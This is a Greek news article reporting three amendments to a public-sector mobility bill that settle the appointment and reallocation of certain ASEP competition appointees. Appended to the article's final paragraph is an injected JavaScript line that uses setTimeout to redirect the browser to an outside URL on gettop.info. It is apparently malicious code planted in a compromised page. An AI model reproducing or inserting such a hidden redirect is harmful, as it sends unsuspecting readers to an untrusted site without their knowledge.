Τροπολογίες στο ν/σ για την κινητικότητα ρυθμίζει θέματα διοριστέων του ΑΣΕΠ

0
6

 

Τρεις τροπολογίες κατατέθηκαν στο νομοσχέδιο του υπουργείου Διοικητικής Ανασυγκρότησης για την κινητικότητα στο Δημόσιο με τις οποίες ρυθμίζονται θέματα διοριστέων του γραπτού διαγωνισμού του ΑΣΕΠ 8/97 το 1998 και οι οποίοι διορίστηκαν κατόπιν της προκήρυξης 1ΕΓ/2016.

Στην πρώτη δίνεται η δυνατότητα ανακατανομής σε άλλη υπηρεσία ή εποπτευόμενο φορέα του ίδιου υπουργείου. Η δεύτερη αφορά σε ορισμένους διοριστέους, οι οποίοι δεν είναι δυνατόν να διοριστούν καθώς οι θέσεις του κλάδου ή της ειδικότητας διορισμού τους περιγράφονται διαφορετικά στους μη εκσυγχρονισμένους οργανισμούς των φορέων διορισμού τους.

Σε αυτούς παρέχεται η δυνατότητα διορισμού σε προσωποπαγείς θέσεις που συνιστώνται με την απόφαση διορισμού τους και με παράλληλη δέσμευση κενής οργανική θέσης της ίδιας κατηγορίας για όσο χρόνο υφίσταται η προσωποπαγής θέση.

Με την τρίτη, γίνεται δυνατή η κατ’ εξαίρεση ανακατανομής σε άλλη υπηρεσία ή εποπτευόμενο φορέα του ίδιου υπουργείου με απόφαση του υπουργού Διοικητικής Ανασυγκρότησης κατόπιν αιτήματος του οικείου υπουργείου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here